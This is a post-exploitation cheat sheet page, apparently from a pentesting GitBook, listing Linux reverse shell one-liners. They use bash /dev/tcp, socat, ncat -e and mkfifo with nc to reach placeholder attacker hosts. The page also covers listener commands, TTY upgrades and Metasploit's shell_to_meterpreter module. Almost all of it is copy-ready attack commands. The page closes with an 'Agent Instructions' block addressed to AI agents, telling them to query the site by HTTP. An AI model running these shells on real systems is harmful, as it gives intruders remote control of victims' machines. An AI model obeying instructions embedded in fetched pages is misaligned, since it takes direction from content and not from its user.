# Shells {% embed url="" %} Normal Shells {% endembed %} {% embed url="" %} Full TTY Shells {% endembed %} ## Bash The classic bash-based reverse shell: ``` /bin/bash -i >& /dev/tcp/TargetIP/TargetPort 0>&1 ``` **Note:** If the payload doesn't work because redirection or ampersand symbols behave weird in the vulnerable application, then base64 encoding the payload often works well. ## Socat TTY Shell Do this for a full socat shell, no need to upgrade it. You need socat installed or a socat static binary for this, though. On kali: ``` socat file:`tty`,raw,echo=0 tcp-listen:4444 ``` On the victim machine: ``` ./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:YOUR_IP_ADDRESS_HERE:4444 ``` Once the connection is made, you probably want to increase the terminal size (run in the reverse shell on the victim machine): ``` stty rows 57 cols 211 ``` ## Ncat Listen to port 8001 on attacker machine: ``` sudo nc -lnvp 8001 ``` Run ncat on the victim machine: ``` ncat ATTACKER_IP_HERE 8001 -e /bin/bash ``` **Note: The command is ncat, not nc or netcat. There is a difference!** ## Mkfifo `sh`-based mkfifo reverse shell: ``` rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP_HERE ATTACKER_PORT_HERE >/tmp/f ``` ## Upgrading Normal Shells to TTY shells ### Switch From ZSH To Bash **Warning**: This doesn't work if your attacking machine uses zsh! You can temporarily switch to bash: ``` exec bash --login ``` You can confirm you're using bash with: ``` ps -p $$ ``` ### Upgrade the Shell Using Python Run this in the reverse shell to upgrade it. Don't worry if your terminal turns weird temporarily. ``` python -c 'import pty;pty.spawn("/bin/bash")' CTRL+Z stty raw -echo fg export TERM=xterm ``` ### Upgrade the Shell Without Python ``` script -qc "/bin/bash -i" /dev/null CTRL+Z stty raw -echo fg export TERM=xterm ``` ## Upgrading Normal Shells to Meterpreter Run `msfconsole`. Create a listener using `multi/handler`: ``` use exploit/multi/handler set lhost YOUR_IP_ADDRESS set lport 4444 run ``` Then use one of the above reverse shells to connect to the listener. Once you have the shell, press `CTRL + Z` to background the shell session. It will tell you the **session number**. Keep that in mind. Next: ``` use post/multi/manage/shell_to_meterpreter set session SESSION_NUMBER run ``` Once the upgrade finishes, you'll be able to see your new session: ``` sessions -l ``` *Note: There's a long-standing bug where it seems to get stuck on "Stopping exploit/multi/handler". Just press enter, it's not actually stuck.* Interact with the new session with: ``` sessions -i NEW_SESSION_NUMBER ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://heinosass.gitbook.io/leet-sheet/post-exploitation/linux/shells.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.